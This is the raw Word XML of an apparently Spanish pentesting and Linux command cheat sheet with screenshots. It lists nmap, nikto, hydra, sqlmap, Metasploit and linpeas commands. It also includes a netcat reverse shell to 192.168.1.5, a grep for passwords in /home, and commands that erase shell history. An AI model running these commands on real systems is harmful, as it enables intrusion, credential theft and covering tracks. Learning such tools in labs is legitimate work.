    <w:p w14:paraId="2447989C" w14:textId="77777777" w:rsidR="0061567B" w:rsidRPr="00206562" w:rsidRDefault="0061567B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72017A55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/var/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660CA180" w14:textId="0DEADC17" w:rsidR="0061567B" w:rsidRPr="00206562" w:rsidRDefault="0061567B" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="060A22FE" wp14:editId="5D3CA336">
            <wp:extent cx="6840220" cy="3671570"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="201890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77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7A6AF727" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194118F5" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A9CAB0" w14:textId="74987EB0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62. Buscar intentos fallidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F131B0" w14:textId="71671B95" w:rsidR="004F3747" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>grep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r w:rsidRPr="00206562">
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>" /var/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134DDA99" w14:textId="284C7A01" w:rsidR="004F3747" w:rsidRPr="00206562" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:r w:rsidRPr="004F3747">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="152F5014" wp14:editId="59D3AACE">
            <wp:extent cx="3866322" cy="704850"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="80894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3035" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId56"/>
                    <a:srcRect l="6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861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AFE67" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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tunap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A9CF6C9" w14:textId="63D93245" w:rsidR="004F3747" w:rsidRPr="00206562" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E6A6985" wp14:editId="2D1F29A3">
            <wp:extent cx="6840220" cy="1116965"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1562982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22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823473C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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spell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4CB072B6" w14:textId="1CDE495E" w:rsidR="004F3747" w:rsidRPr="00206562" w:rsidRDefault="004F3747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16B1596B" wp14:editId="2B1A9FBC">
            <wp:extent cx="6840220" cy="3550920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="159993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15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65EA626D" w14:textId="52840126" w:rsidR="004F3747" w:rsidRPr="00206562" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:r w:rsidRPr="004F3747">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D2CF588" wp14:editId="30D43D5F">
            <wp:extent cx="3867690" cy="590632"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28028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2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A632" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/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155D42EF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54A375AB" w14:textId="090CA0DA" w:rsidR="004F3747" w:rsidRPr="00206562" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44837947" wp14:editId="02D06779">
            <wp:extent cx="1981200" cy="752475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15149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20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0302EA98" w14:textId="0FB5960B" w:rsidR="004F3747" w:rsidRPr="00206562" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:r w:rsidRPr="004F3747">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4449E735" wp14:editId="6237B378">
            <wp:extent cx="1733792" cy="638264"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1932910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02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status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61162E60" w14:textId="5FD7015B" w:rsidR="004F3747" w:rsidRPr="00206562" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="565BDEEB" wp14:editId="1D83B590">
            <wp:extent cx="4686300" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1198064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644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4B19F0B2" w:rsidR="00206562" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00206562" w:rsidRPr="00206562">
        <w:t>op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8EDFE2" w14:textId="02D9C117" w:rsidR="004F3747" w:rsidRPr="00206562" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76D139E9" wp14:editId="6DA3A735">
            <wp:extent cx="6840220" cy="6047105"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39658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532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3CC0C55F" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB305D6" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66001EF9" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013A7234" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C1AD2E" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4968E39F" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5949B74A" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C6E643" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705E63A1" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB67D23" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2140D401" w14:textId="77777777" w:rsidR="004F3747" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643632B5" w14:textId="56EB7052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70. Alternativa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44301C" w14:textId="492D39D9" w:rsidR="00206562" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00206562" w:rsidRPr="00206562">
        <w:t>top</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C705AED" w14:textId="7CE45F30" w:rsidR="004F3747" w:rsidRPr="00206562" w:rsidRDefault="004F3747" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6024ADE5" wp14:editId="42A0C26B">
            <wp:extent cx="6840220" cy="4348480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="206880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0903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6F88C3E0" w14:textId="77777777" w:rsidR="00877BCD" w:rsidRDefault="00877BCD" w:rsidP="00206562">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="687C2F15" w14:textId="77777777" w:rsidR="00877BCD" w:rsidRDefault="00877BCD" w:rsidP="00877BCD"/>
    <w:p w14:paraId="1EFB5235" w14:textId="77777777" w:rsidR="00877BCD" w:rsidRDefault="00877BCD" w:rsidP="00877BCD"/>
    <w:p w14:paraId="1275A439" w14:textId="77777777" w:rsidR="00877BCD" w:rsidRDefault="00877BCD" w:rsidP="00877BCD"/>
    <w:p w14:paraId="50F7BE23" w14:textId="77777777" w:rsidR="00877BCD" w:rsidRPr="00877BCD" w:rsidRDefault="00877BCD" w:rsidP="00877BCD"/>
    <w:p w14:paraId="5C230475" w14:textId="352535AB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-A -T4 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE14574" w14:textId="6113CE1B" w:rsidR="00877BCD" w:rsidRPr="00206562" w:rsidRDefault="00877BCD" w:rsidP="00206562">
      <w:r w:rsidRPr="00877BCD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FD6DE1D" wp14:editId="0113E57E">
            <wp:extent cx="6706536" cy="1019317"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1606492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269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2B80DEB4" w14:textId="77777777" w:rsidR="00877BCD" w:rsidRDefault="00877BCD" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6571CA36" w14:textId="47FF62DF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67721A" w14:textId="59B6CD1C" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidR="008D600C" w:rsidRPr="0016650E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.10</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="559979AA" w14:textId="195A7DEC" w:rsidR="008D600C" w:rsidRDefault="008D600C" w:rsidP="00206562">
      <w:r w:rsidRPr="008D600C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F9D8A18" wp14:editId="19C79FE0">
            <wp:extent cx="4982270" cy="571580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45260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085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F24" w14:textId="77777777" w:rsidR="00877BCD" w:rsidRPr="00206562" w:rsidRDefault="00877BCD" w:rsidP="00206562"/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415F03F8" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB51377" w14:textId="00D4F88C" w:rsidR="00170674" w:rsidRPr="00206562" w:rsidRDefault="00170674" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="054FCA3C" wp14:editId="19CEEE7B">
            <wp:extent cx="6840220" cy="983615"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="713225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256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1D41DE41" w14:textId="2B269666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sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "http://site.com?id=1" </w:t>
      </w:r>
      <w:r w:rsidR="00170674">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E2A75D3" w14:textId="6F31C35A" w:rsidR="00170674" w:rsidRPr="00206562" w:rsidRDefault="00170674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63205372" wp14:editId="0A66D982">
            <wp:extent cx="6840220" cy="1901825"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1912523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345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154B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/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Default="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>dnsenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> dominio.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6813DDE4" w14:textId="476ABB0B" w:rsidR="00170674" w:rsidRPr="00206562" w:rsidRDefault="00170674" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="649678E0" wp14:editId="7BA80815">
            <wp:extent cx="6448425" cy="8420100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="130162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34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lastRenderedPageBreak/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495FF62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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e /bin/bash 192.168.1.5 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0352D2" w14:textId="5BCACD31" w:rsidR="00170674" w:rsidRPr="00206562" w:rsidRDefault="00170674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0E2EBAE7" wp14:editId="31C4EB30">
            <wp:extent cx="4286250" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="108996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664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3B3D675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5AD6619C" w14:textId="7726C5B5" w:rsidR="00170674" w:rsidRPr="00206562" w:rsidRDefault="00170674" w:rsidP="00206562">
      <w:r w:rsidRPr="00170674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="257BA964" wp14:editId="141E25E4">
            <wp:extent cx="2686425" cy="562053"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="25376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39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292E7374" w:rsidR="00206562" w:rsidRDefault="00170674" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00206562" w:rsidRPr="00206562">
        <w:t>sfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F41FD02" w14:textId="51C4DB60" w:rsidR="00170674" w:rsidRPr="00206562" w:rsidRDefault="00170674" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0820DCCD" wp14:editId="59896C00">
            <wp:extent cx="6840220" cy="7158355"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1482512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246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</w:p>
    <w:p w14:paraId="00023A83" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2916B429" w14:textId="543FA306" w:rsidR="007E729C" w:rsidRPr="00206562" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="285DEEA1" wp14:editId="3DA360EA">
            <wp:extent cx="6840220" cy="639445"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="119931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23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B151541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26F5C9F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9836DBF" w14:textId="5FA79AD6" w:rsidR="007E729C" w:rsidRPr="00206562" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BEBDC02" wp14:editId="62641184">
            <wp:extent cx="5753100" cy="5572125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1082789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8940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/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218C863C" w14:textId="01AFC1B3" w:rsidR="007E729C" w:rsidRPr="00206562" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EA6974A" wp14:editId="6806D29E">
            <wp:extent cx="3409950" cy="5353050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="141571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160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5429D235" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="799EDC08">
          <v:rect id="_x0000_i1102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6456E04B" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157C4E61" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545B1134" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF922FB" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0418E0FA" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="221C66CD" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A80B6C1" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A037097" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2366EAF2" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F136C80" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DDBDD7" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63722773" w14:textId="4736295D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r w:rsidRPr="00206562">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>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P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7DE24CB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55675C1F" w14:textId="0A9258DA" w:rsidR="007E729C" w:rsidRPr="00206562" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B674F54" wp14:editId="6EA47941">
            <wp:extent cx="6840220" cy="7096760"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="898577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770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44D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5E6C0C26">
          <v:rect id="_x0000_i1103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6404C04D" w14:textId="77777777" w:rsidR="007E729C" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736E7D81" w14:textId="25523DE4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r w:rsidRPr="00206562">
        <w:t>crontab</w:t>
      </w:r>
      <w:proofErr w:type="spell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4F16D015" w14:textId="6E6FE761" w:rsidR="007E729C" w:rsidRPr="00206562" w:rsidRDefault="007E729C" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="560C5B43" wp14:editId="41481FE0">
            <wp:extent cx="6840220" cy="3286760"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="145059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419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/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3AAD1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57E8E2B9" w14:textId="3702DB85" w:rsidR="0094379E" w:rsidRPr="00206562" w:rsidRDefault="0094379E" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03AC50F1" wp14:editId="04A9D5F1">
            <wp:extent cx="6105525" cy="6343650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="292615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53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r w:rsidRPr="00206562">
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495A7ED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355455AB" w14:textId="75C182E9" w:rsidR="0094379E" w:rsidRPr="00206562" w:rsidRDefault="0094379E" w:rsidP="00206562">
      <w:r w:rsidRPr="0094379E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BC81B8F" wp14:editId="2A4BDCDF">
            <wp:extent cx="6840220" cy="852170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="779466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698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09C4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/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+x linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F15B2B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49F18A82" w14:textId="4FEC4B91" w:rsidR="0094379E" w:rsidRPr="00206562" w:rsidRDefault="0094379E" w:rsidP="00206562">
      <w:r w:rsidRPr="0094379E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="371BE786" wp14:editId="1BD37E3B">
            <wp:extent cx="6840220" cy="4351655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="994094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445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11906FB7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t>grep -r "password" /home 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1A6F6F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0353F11" w14:textId="3FC6BDAC" w:rsidR="0094379E" w:rsidRPr="00206562" w:rsidRDefault="0094379E" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46673B50" wp14:editId="6846AAFA">
            <wp:extent cx="6840220" cy="3839845"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1300186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64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3CAA2CE2" w14:textId="7959CDF6" w:rsidR="0094379E" w:rsidRPr="00206562" w:rsidRDefault="0094379E" w:rsidP="00206562">
      <w:r w:rsidRPr="0094379E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="053F4963" wp14:editId="67EF078C">
            <wp:extent cx="4458322" cy="1390844"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79442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201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lastRenderedPageBreak/>
        <w:t>history -c</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>rm -rf ~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 w:rsidSect="004C0AD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0" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
    </w:pict>
  </w:numPicBullet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27F1E"/>
    <w:rsid w:val="000944F3"/>
    <w:rsid w:val="000E278A"/>
    <w:rsid w:val="00166CE1"/>
    <w:rsid w:val="00170674"/>
    <w:rsid w:val="00206562"/>
    <w:rsid w:val="002A7F2B"/>
    <w:rsid w:val="003B02F2"/>
    <w:rsid w:val="00470734"/>
    <w:rsid w:val="00484134"/>
    <w:rsid w:val="004C0AD1"/>
    <w:rsid w:val="004F3747"/>
